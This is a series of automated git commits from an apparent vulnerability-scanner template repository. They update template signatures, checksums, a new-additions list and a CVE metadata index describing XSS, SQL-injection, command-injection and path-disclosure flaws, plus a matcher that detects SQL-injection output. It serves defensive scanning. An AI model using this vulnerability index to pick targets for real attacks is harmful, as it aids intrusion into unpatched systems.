4a0a004730450220252e874bdcc9c0296d7781a591285456c4ccaedc48693e9bbcb8da72430daf4d022100a488de0fb1b369aba98314ada0d237a574b07baff479bcf1558a840d18f52ba1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1315.yaml b/http/cves/2023/CVE-2023-1315.yaml index 577adea4dc..f6de53dd68 100644 --- a/http/cves/2023/CVE-2023-1315.yaml +++ b/http/cves/2023/CVE-2023-1315.yaml @@ -78,3 +78,5 @@ http: - 'contains(header, "text/html")' - 'status_code == 200' condition: and + +# digest: 490a0046304402201bebf15e1b69288326f9a85cfe2771f6d3498cdb90407f7773c40e20268c02cc022069d21d9e18641e149ee2171c9bc5684a81d2412b2c00fdd693486af07aee113d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/root-path-disclosure.yaml b/http/misconfiguration/root-path-disclosure.yaml index 91fdf36ace..a2b656871a 100644 --- a/http/misconfiguration/root-path-disclosure.yaml +++ b/http/misconfiguration/root-path-disclosure.yaml @@ -35,5 +35,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502201df7e689574db38cce538cfc683a70830f20bcc236b208d017ff53f6d2297fab02210087a84eb96e50f50746d6de34558adbe908ef6b5041b9f13dce08327142290850:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009b4e9101d1f7d2ca2655255b58fa8200358289497f1a6093cb49884816de63b6022100f2a74c6c7829b157266e4cd4ddd96d1cffdc08ab963db579b0d18b3697d16919:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/passive/cves/2024/CVE-2024-40711.yaml b/passive/cves/2024/CVE-2024-40711.yaml index 365a1756b9..0c388ea831 100644 --- a/passive/cves/2024/CVE-2024-40711.yaml +++ b/passive/cves/2024/CVE-2024-40711.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100c5145705dd3176a41c9abc1702393af9afe77eb8c4ddcca0525f5172a5ce9f7d022100ce14b5f0590cd9fb09507caaa2378089a7701671b0fb1d2d1885eff9d5c11dd2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f5165ed56d94158fb1d78fdd61710cd59d9f3b524e3479f6c3e8d20c3b19b84f02207b20a3b89301a3202d24707623bf645f4dd6b38a547a485a33570be0ac960791:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 4deed98794ba84f7d94d30b1b213da711314f3c4 Mon Sep 17 00:00:00 2001 From: ghost <ghost@users.noreply.github.com> Date: Tue, 15 Oct 2024 09:16:27 +0000 Subject: [PATCH 131/218] =?UTF-8?q?chore:=20generate=20new=20addition=20li?= =?UTF-8?q?st=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 74d45756f5..586dff174a 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,5 @@ http/cves/2015/CVE-2015-8562.yaml +http/cves/2018/CVE-2018-7196.yaml http/cves/2021/CVE-2021-45811.yaml http/cves/2023/CVE-2023-1315.yaml http/cves/2023/CVE-2023-1317.yaml From 7d9660b0b8969750295dbdeded2783f5a28762fa Mon Sep 17 00:00:00 2001 From: ghost <ghost@users.noreply.github.com> Date: Tue, 15 Oct 2024 09:16:31 +0000 Subject: [PATCH 132/218] =?UTF-8?q?chore:=20generate=20CVEs=20metadata=20?= =?UTF-8?q?=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cves.json | 1 + cves.json-checksum.txt | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index 3967dfbd72..364eaf0596 100644 --- a/cves.json +++ b/cves.json @@ -629,6 +629,7 @@ {"ID":"CVE-2018-6530","Info":{"Name":"D-Link - Unauthenticated Remote Code Execution","Severity":"critical","Description":"OS command injection vulnerability in soap.cgi (soapcgi_main in cgibin) in D-Link DIR-880L DIR-880L_REVA_FIRMWARE_PATCH_1.08B04 and previous versions, DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-65L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to execute arbitrary OS commands via the service parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-6530.yaml"} {"ID":"CVE-2018-6605","Info":{"Name":"Joomla! Component Zh BaiduMap 3.0.0.1 - SQL Injection","Severity":"critical","Description":"SQL Injection exists in the Zh BaiduMap 3.0.0.1 component for Joomla! via the id parameter in a getPlacemarkDetails, getPlacemarkHoverText, getPathHoverText, or getPathDetails request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-6605.yaml"} {"ID":"CVE-2018-6910","Info":{"Name":"DedeCMS 5.7 - Path Disclosure","Severity":"high","Description":"DedeCMS 5.7 allows remote attackers to discover the full path via a direct request for include/downmix.inc.php or inc/inc_archives_functions.php","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-6910.yaml"} +{"ID":"CVE-2018-7196","Info":{"Name":"osTicket \u003c 1.10.2 - Cross-Site Scripting","Severity":"medium","Description":"Cross-site scripting (XSS) vulnerability in /scp/index.php in Enhancesoft osTicket before 1.10.2 allows remote attackers to inject arbitrary web script or HTML via the \"sort\" parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-7196.yaml"} {"ID":"CVE-2018-7251","Info":{"Name":"Anchor CMS 0.12.3 - Error Log Exposure","Severity":"critical","Description":"Anchor CMS 0.12.3 is susceptible to an error log exposure vulnerability due to an issue in config/error.php. The error log is exposed at an errors.log URI, and contains MySQL credentials if a MySQL error (such as \"Too many connections\") has occurred.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-7251.yaml"} {"ID":"CVE-2018-7282","Info":{"Name":"TITool PrintMonitor - Blind SQL Injection","Severity":"critical","Description":"The username parameter of the TITool PrintMonitor solution during the login request is vulnerable to and/or time-based blind SQLi.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-7282.yaml"} {"ID":"CVE-2018-7314","Info":{"Name":"Joomla! Component PrayerCenter 3.0.2 - SQL Injection","Severity":"critical","Description":"SQL Injection exists in the PrayerCenter 3.0.2 component for Joomla! via the sessionid parameter, a different vulnerability than CVE-2008-6429.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-7314.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index a7c6ded282..cf5318e713 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -23a1ae5566bbcc02d28fe10be1ff51a2 +a9a7a15a15a8e27e9f7f7682de08b387 From 5769f62a4baee92d6ddf55fae854cd17369ccfc6 Mon Sep 17 00:00:00 2001 From: ghost <ghost@users.noreply.github.com> Date: Tue, 15 Oct 2024 09:16:35 +0000 Subject: [PATCH 133/218] =?UTF-8?q?chore:=20generate=20templates=20checksu?= =?UTF-8?q?m=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- templates-checksum.txt | 17 +++++++++-------- 1 file changed, 9 insertions(+), 8 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index ce57bdaac5..417fd9be73 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -418,8 +418,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:e627b588e4bb1b2d47b8a9f321ebee5324705a9f -cves.json-checksum.txt:b72ffc9381578d941cfb058bbe6a3230b71a93e8 +cves.json:3fafa4e0670d7e15b55839ca095c10cd7742dd43 +cves.json-checksum.txt:8c002c6e1bdf5c8db56a0990f88415992f2a4af0 dast/cves/2018/CVE-2018-19518.yaml:3407e99af553fe5bdb0ffc001a4132e169c55730 dast/cves/2021/CVE-2021-45046.yaml:a52633e88957969fb09969be45c0a8606ee3d752 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -1537,7 +1537,7 @@ http/cves/2015/CVE-2015-7780.yaml:353b0363275dc05f4d2f6c352a61b80eedc1de43 http/cves/2015/CVE-2015-7823.yaml:037fa0a802e5e6081be7d50f78227d296733ad25 http/cves/2015/CVE-2015-8349.yaml:856790657d418e60710c440179383bf5528db0b6 http/cves/2015/CVE-2015-8399.yaml:a504f142c32f0e890063057088ffb8c3b39c4a74 -http/cves/2015/CVE-2015-8562.yaml:182760cc54a0020b6f6652581c484277365534a8 +http/cves/2015/CVE-2015-8562.yaml:f3d77cde2bbf8a54251f32c4f6f2148dee44ccd5 http/cves/2015/CVE-2015-8813.yaml:6871ac55ac5ff533b2f5d8965baf1eefee256f9f http/cves/2015/CVE-2015-9312.yaml:7cc0a19a624945d3fde03ebd0ba95c2c6e3c9410 http/cves/2015/CVE-2015-9323.yaml:35c614423d01772c2c72b1287a264bb350109ecc @@ -1849,6 +1849,7 @@ http/cves/2018/CVE-2018-6200.yaml:3e6473129d625093af721e2e6cac53ac702aa99c http/cves/2018/CVE-2018-6530.yaml:c9f5fd5828e6825e4e2429b612b21820ef7e8e48 http/cves/2018/CVE-2018-6605.yaml:4c52ab31c5528441d5cdb88b6da9eee6ee7197e0 http/cves/2018/CVE-2018-6910.yaml:1662c242773d5c5b17b063fd3f30a958c575b8bd +http/cves/2018/CVE-2018-7196.yaml:7e973067fa5bdf26ec1aa5c4727c98d212fdb7b7 http/cves/2018/CVE-2018-7251.yaml:35bdb470f05dec3b89486bd31a38d23be7d85346 http/cves/2018/CVE-2018-7282.yaml:be0c74b3dbba955d79d30c81b2fdc9e89502a91b http/cves/2018/CVE-2018-7314.yaml:dfed8b8206e6720d6d51363adc96f9ba89368e76 @@ -2722,7 +2723,7 @@ http/cves/2021/CVE-2021-45380.yaml:f24398df04fa60b12219061f6d11cc69fa9f6df6 http/cves/2021/CVE-2021-45382.yaml:cb0aa02a98b1cdfda90a720aed418fb486944046 http/cves/2021/CVE-2021-45422.yaml:2cf95513dc085cd08d0a9217c72c63192320ade9 http/cves/2021/CVE-2021-45428.yaml:14d98248ac661705a256a679f0eb6e1e48233c2b -http/cves/2021/CVE-2021-45811.yaml:13e6e6c82d54b1fc7def5d2c32c83021c0c1a416 +http/cves/2021/CVE-2021-45811.yaml:c1e01707da693fece6881bcc85259cdcc5263bf4 http/cves/2021/CVE-2021-45967.yaml:1c060977d1fab68ce71716addc499b6eaea77589 http/cves/2021/CVE-2021-45968.yaml:921c33e7aeeb0b0ce6f57a9e457d202de0285cd8 http/cves/2021/CVE-2021-46005.yaml:3b3b7ae4a988dd406432da64978b8a385a76f20d @@ -3242,7 +3243,7 @@ http/cves/2023/CVE-2023-1020.yaml:62fc61d24e0e1681b1bf64d37033caecf096364a http/cves/2023/CVE-2023-1080.yaml:57fd2d5ede5e09e53ef5c560add050d334ba9b09 http/cves/2023/CVE-2023-1177.yaml:ab4b55e867e4a8f730b51207ffea03e8053bf1d1 http/cves/2023/CVE-2023-1263.yaml:954755ea23eaab8dbf35c5b53d78ae5642ac7c11 -http/cves/2023/CVE-2023-1315.yaml:47a054680d17ad73df6bcb1ba0870261394b34f6 +http/cves/2023/CVE-2023-1315.yaml:a53ea34f6981643216909cf0f2c3ce39b237e608 http/cves/2023/CVE-2023-1317.yaml:eea86a0c023e1fdfd5e5d7ef2a6a800284012074 http/cves/2023/CVE-2023-1362.yaml:6e432a7601e15e3e50f24c19ef101f6395404113 http/cves/2023/CVE-2023-1408.yaml:2c3e73f4296c1f9606b8e377436ebdbfe1f715e2 @@ -6419,7 +6420,7 @@ http/misconfiguration/rekognition-image-validation.yaml:320e0300b3a242448eeb3ac6 http/misconfiguration/repetier-unauth.yaml:49e1a9eb30a8a755654e401669d9a39e3c09e3a7 http/misconfiguration/request-baskets-exposure.yaml:02d2c2b167c7281ef3c0e9315f05507f2270c827 http/misconfiguration/rethinkdb-admin-console.yaml:5898dfe2d5c65ff468a51596226569ab87ea6d17 -http/misconfiguration/root-path-disclosure.yaml:e9a6467ccdcbfaac967f7df1ae6d71a83793caaa +http/misconfiguration/root-path-disclosure.yaml:0bc24d4e6c47a38038cad29b4d89c28701d38591 http/misconfiguration/roxyfileman-fileupload.yaml:ed5188248f91ec32600369efa8f74eeb68ec3441 http/misconfiguration/s3-torrent.yaml:cb8cf43a0671794f2618c3cadc81a768a775d857 http/misconfiguration/salesforce-aura.yaml:855d650ee81f9e1640873673b7e7aaaf8a1f88f3 @@ -9430,7 +9431,7 @@ network/misconfig/tidb-unauth.yaml:31f8d2286bd7557d53f7ff18011a9ec7732ca117 network/misconfig/unauth-psql.yaml:321787e18e6164df765b26b771bd22606f3cd55d network/vulnerabilities/clockwatch-enterprise-rce.yaml:1174218309884e2cc7b11eb461395217c3cf1e95 passive/cves/2024/CVE-2024-25723.yaml:7eb36ba743582e6c04a324131d789035b7e6d72c -passive/cves/2024/CVE-2024-40711.yaml:44e07f59b54b5429a09a298df997dd1f4fb58487 +passive/cves/2024/CVE-2024-40711.yaml:1657fcfa4d0fe846f9ea219cae6304e350691a03 profiles/README.md:84e7479141844434737d87eea1ab678c04d11c33 profiles/all.yml:29a13b0b8f2933e1af3fefddd2d0761b439dc01f profiles/aws-cloud-config.yml:62e4b0c8d93906ff00ab4785b5725f8799101f68 @@ -9478,7 +9479,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:0117e23b7e70e3c450163d5035c7e8865701c2fc +templates-checksum.txt:4f77432ae7b13dd765526b6d7dcbd74971ac2fb5 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From d360875d3867138252bc3457804b059b49fd693f Mon Sep 17 00:00:00 2001 From: ghost <ghost@users.noreply.github.com> Date: Tue, 15 Oct 2024 09:17:12 +0000 Subject: [PATCH 134/218] =?UTF-8?q?chore:=20generate=20new=20addition=20li?= =?UTF-8?q?st=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 586dff174a..b663907cc1 100644 --- a/.new-additions +++ b/.new-additions @@ -3,6 +3,7 @@ http/cves/2018/CVE-2018-7196.yaml http/cves/2021/CVE-2021-45811.yaml http/cves/2023/CVE-2023-1315.yaml http/cves/2023/CVE-2023-1317.yaml +http/cves/2023/CVE-2023-1318.yaml http/cves/2024/CVE-2024-39713.yaml http/cves/2024/CVE-2024-43360.yaml http/cves/2024/CVE-2024-44349.yaml From 68932c1e24a011923c8e5783dd6323dd32c57789 Mon Sep 17 00:00:00 2001 From: ghost <ghost@users.noreply.github.com> Date: Tue, 15 Oct 2024 09:17:23 +0000 Subject: [PATCH 135/218] =?UTF-8?q?chore:=20generate=20new=20addition=20li?= =?UTF-8?q?st=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index b663907cc1..80137a7902 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,5 @@ http/cves/2015/CVE-2015-8562.yaml +http/cves/2018/CVE-2018-7192.yaml http/cves/2018/CVE-2018-7196.yaml http/cves/2021/CVE-2021-45811.yaml http/cves/2023/CVE-2023-1315.yaml From 82d45ed644fc2b14639f9927989bc39d358849be Mon Sep 17 00:00:00 2001 From: ghost <ghost@users.noreply.github.com> Date: Tue, 15 Oct 2024 09:17:28 +0000 Subject: [PATCH 136/218] =?UTF-8?q?chore:=20generate=20CVEs=20metadata=20?= =?UTF-8?q?=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cves.json | 3 +++ cves.json-checksum.txt | 2 +- 2 files changed, 4 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index 364eaf0596..cc7ccb0ea6 100644 --- a/cves.json +++ b/cves.json @@ -629,6 +629,8 @@ {"ID":"CVE-2018-6530","Info":{"Name":"D-Link - Unauthenticated Remote Code Execution","Severity":"critical","Description":"OS command injection vulnerability in soap.cgi (soapcgi_main in cgibin) in D-Link DIR-880L DIR-880L_REVA_FIRMWARE_PATCH_1.08B04 and previous versions, DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-65L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to execute arbitrary OS commands via the service parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-6530.yaml"} {"ID":"CVE-2018-6605","Info":{"Name":"Joomla! Component Zh BaiduMap 3.0.0.1 - SQL Injection","Severity":"critical","Description":"SQL Injection exists in the Zh BaiduMap 3.0.0.1 component for Joomla! via the id parameter in a getPlacemarkDetails, getPlacemarkHoverText, getPathHoverText, or getPathDetails request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-6605.yaml"} {"ID":"CVE-2018-6910","Info":{"Name":"DedeCMS 5.7 - Path Disclosure","Severity":"high","Description":"DedeCMS 5.7 allows remote attackers to discover the full path via a direct request for include/downmix.inc.php or inc/inc_archives_functions.php","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-6910.yaml"} +{"ID":"CVE-2018-7192","Info":{"Name":"osTicket \u003c 1.10.2 - Cross-Site Scripting","Severity":"medium","Description":"Cross-site scripting (XSS) vulnerability in /ajax.php/form/help-topic in Enhancesoft osTicket before 1.10.2 allows remote attackers to inject arbitrary web script or HTML via the \"message\" parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-7192.yaml"} +{"ID":"CVE-2018-7193","Info":{"Name":"osTicket \u003c 1.10.2 - Cross-Site Scripting","Severity":"medium","Description":"Cross-site scripting (XSS) vulnerability in /scp/directory.php in Enhancesoft osTicket before 1.10.2 allows remote attackers to inject arbitrary web script or HTML via the \"order\" parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-7193.yaml"} {"ID":"CVE-2018-7196","Info":{"Name":"osTicket \u003c 1.10.2 - Cross-Site Scripting","Severity":"medium","Description":"Cross-site scripting (XSS) vulnerability in /scp/index.php in Enhancesoft osTicket before 1.10.2 allows remote attackers to inject arbitrary web script or HTML via the \"sort\" parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-7196.yaml"} {"ID":"CVE-2018-7251","Info":{"Name":"Anchor CMS 0.12.3 - Error Log Exposure","Severity":"critical","Description":"Anchor CMS 0.12.3 is susceptible to an error log exposure vulnerability due to an issue in config/error.php. The error log is exposed at an errors.log URI, and contains MySQL credentials if a MySQL error (such as \"Too many connections\") has occurred.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-7251.yaml"} {"ID":"CVE-2018-7282","Info":{"Name":"TITool PrintMonitor - Blind SQL Injection","Severity":"critical","Description":"The username parameter of the TITool PrintMonitor solution during the login request is vulnerable to and/or time-based blind SQLi.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-7282.yaml"} @@ -2025,6 +2027,7 @@ {"ID":"CVE-2023-1263","Info":{"Name":"Coming Soon \u0026 Maintenance \u003c 4.1.7 - Unauthenticated Post/Page Access","Severity":"medium","Description":"The plugin does not restrict access to published and non protected posts/pages when the maintenance mode is enabled, allowing unauthenticated users to access them.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-1263.yaml"} {"ID":"CVE-2023-1315","Info":{"Name":"osTicket \u003c v1.16.6 - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository osticket/osticket prior to v1.16.6.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-1315.yaml"} {"ID":"CVE-2023-1317","Info":{"Name":"osTicket \u003c v1.16.6 - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository osticket/osticket prior to v1.16.6.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-1317.yaml"} +{"ID":"CVE-2023-1318","Info":{"Name":"osTicket \u003c v1.16.6 - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Generic in GitHub repository osticket/osticket prior to v1.16.6.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-1318.yaml"} {"ID":"CVE-2023-1362","Info":{"Name":"unilogies/bumsys \u003c v2.0.2 - Clickjacking","Severity":"medium","Description":"This template checks for the presence of clickjacking prevention headers in the HTTP response, aiming to identify vulnerabilities related to the improper restriction of rendered UI layers or frames in the GitHub repository unilogies/bumsys prior to version 2.0.2.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1362.yaml"} {"ID":"CVE-2023-1408","Info":{"Name":"Video List Manager \u003c= 1.7 - SQL Injection","Severity":"high","Description":"The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2023/CVE-2023-1408.yaml"} {"ID":"CVE-2023-1434","Info":{"Name":"Odoo - Cross-Site Scripting","Severity":"medium","Description":"Odoo is a business suite that has features for many business-critical areas, such as e-commerce, billing, or CRM. Versions before the 16.0 release are vulnerable to CVE-2023-1434 and is caused by an incorrect content type being set on an API endpoint.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-1434.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index cf5318e713..0d94438100 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -a9a7a15a15a8e27e9f7f7682de08b387 +c95bef52b10e64bc82378636bdb96e68 From 44063e5ca3b20fb417df880350db8df9deb23586 Mon Sep 17 00:00:00 2001 From: ghost <ghost@users.noreply.github.com> Date: Tue, 15 Oct 2024 09:17:38 +0000 Subject: [PATCH 137/218] =?UTF-8?q?chore:=20generate=20templates=20checksu?= =?UTF-8?q?m=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- templates-checksum.txt | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 417fd9be73..d565d7f62d 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -418,8 +418,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:3fafa4e0670d7e15b55839ca095c10cd7742dd43 -cves.json-checksum.txt:8c002c6e1bdf5c8db56a0990f88415992f2a4af0 +cves.json:0c172bdd6d48baf337487174e0da4f0f10277730 +cves.json-checksum.txt:f5aa03e3ec3ecd58d192edad5ede7b503006d020 dast/cves/2018/CVE-2018-19518.yaml:3407e99af553fe5bdb0ffc001a4132e169c55730 dast/cves/2021/CVE-2021-45046.yaml:a52633e88957969fb09969be45c0a8606ee3d752 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -1849,6 +1849,8 @@ http/cves/2018/CVE-2018-6200.yaml:3e6473129d625093af721e2e6cac53ac702aa99c http/cves/2018/CVE-2018-6530.yaml:c9f5fd5828e6825e4e2429b612b21820ef7e8e48 http/cves/2018/CVE-2018-6605.yaml:4c52ab31c5528441d5cdb88b6da9eee6ee7197e0 http/cves/2018/CVE-2018-6910.yaml:1662c242773d5c5b17b063fd3f30a958c575b8bd +http/cves/2018/CVE-2018-7192.yaml:a1e40dfc4020146019c1badc2740c05c247e4ef9 +http/cves/2018/CVE-2018-7193.yaml:fd7af1eb0aa46d5a40e0ed0cad16cb8094b756ec http/cves/2018/CVE-2018-7196.yaml:7e973067fa5bdf26ec1aa5c4727c98d212fdb7b7 http/cves/2018/CVE-2018-7251.yaml:35bdb470f05dec3b89486bd31a38d23be7d85346 http/cves/2018/CVE-2018-7282.yaml:be0c74b3dbba955d79d30c81b2fdc9e89502a91b @@ -3245,6 +3247,7 @@ http/cves/2023/CVE-2023-1177.yaml:ab4b55e867e4a8f730b51207ffea03e8053bf1d1 http/cves/2023/CVE-2023-1263.yaml:954755ea23eaab8dbf35c5b53d78ae5642ac7c11 http/cves/2023/CVE-2023-1315.yaml:a53ea34f6981643216909cf0f2c3ce39b237e608 http/cves/2023/CVE-2023-1317.yaml:eea86a0c023e1fdfd5e5d7ef2a6a800284012074 +http/cves/2023/CVE-2023-1318.yaml:0d0831a4d460eb10cf00c23d73899fc2be19f222 http/cves/2023/CVE-2023-1362.yaml:6e432a7601e15e3e50f24c19ef101f6395404113 http/cves/2023/CVE-2023-1408.yaml:2c3e73f4296c1f9606b8e377436ebdbfe1f715e2 http/cves/2023/CVE-2023-1434.yaml:93e41771aad3b211bd99c40258acee718147332a @@ -9479,7 +9482,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:4f77432ae7b13dd765526b6d7dcbd74971ac2fb5 +templates-checksum.txt:82cfbf7a9c71ce5bcfcc21cf5e6d9f591c681a8c wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 1d32bcf6b2817e58a4f4c0d7b29d65101deace7e Mon Sep 17 00:00:00 2001 From: ghost <ghost@users.noreply.github.com> Date: Tue, 15 Oct 2024 09:18:08 +0000 Subject: [PATCH 138/218] =?UTF-8?q?chore:=20sign=20templates=20?= =?UTF-8?q?=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- http/cves/2018/CVE-2018-7196.yaml | 2 ++ http/cves/2021/CVE-2021-45811.yaml | 3 +-- http/cves/2023/CVE-2023-1315.yaml | 3 +-- http/cves/2023/CVE-2023-1317.yaml | 2 ++ 4 files changed, 6 insertions(+), 4 deletions(-) diff --git a/http/cves/2018/CVE-2018-7196.yaml b/http/cves/2018/CVE-2018-7196.yaml index ae616b921e..1e44b72ef6 100644 --- a/http/cves/2018/CVE-2018-7196.yaml +++ b/http/cves/2018/CVE-2018-7196.yaml @@ -70,3 +70,5 @@ http: - 'contains(header, "text/html")' - 'status_code == 200' condition: and + +# digest: 4b0a00483046022100eca5508a6c0d079c15b0a6b9372c91991910ad34d6dfb7de196eeb8afffc6804022100ffbad15a4a2520a5a3fb30d19ab23ba1d2e98bec7e0577224e500e5638740e5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-45811.yaml b/http/cves/2021/CVE-2021-45811.yaml index c64bf5da59..221a1401ef 100644 --- a/http/cves/2021/CVE-2021-45811.yaml +++ b/http/cves/2021/CVE-2021-45811.yaml @@ -65,5 +65,4 @@ http: - type: dsl dsl: - contains_all(body_2, "FROM (SELECT", "topic_id_val\'\' IN NATURAL", "ORDER BY relevance") - -# digest: 4a0a004730450220252e874bdcc9c0296d7781a591285456c4ccaedc48693e9bbcb8da72430daf4d022100a488de0fb1b369aba98314ada0d237a574b07baff479bcf1558a840d18f52ba1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205cc02f7b820e5331fe9be93e73d2a1386287fc72bdc45ff952a4c37b8bda3866022030d6880a65c877c244a1b41bf61374798ab06cfb371593bd22ee05a96189a8bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1315.yaml b/http/cves/2023/CVE-2023-1315.yaml index f6de53dd68..e5bbc0c825 100644 --- a/http/cves/2023/CVE-2023-1315.yaml +++ b/http/cves/2023/CVE-2023-1315.yaml @@ -78,5 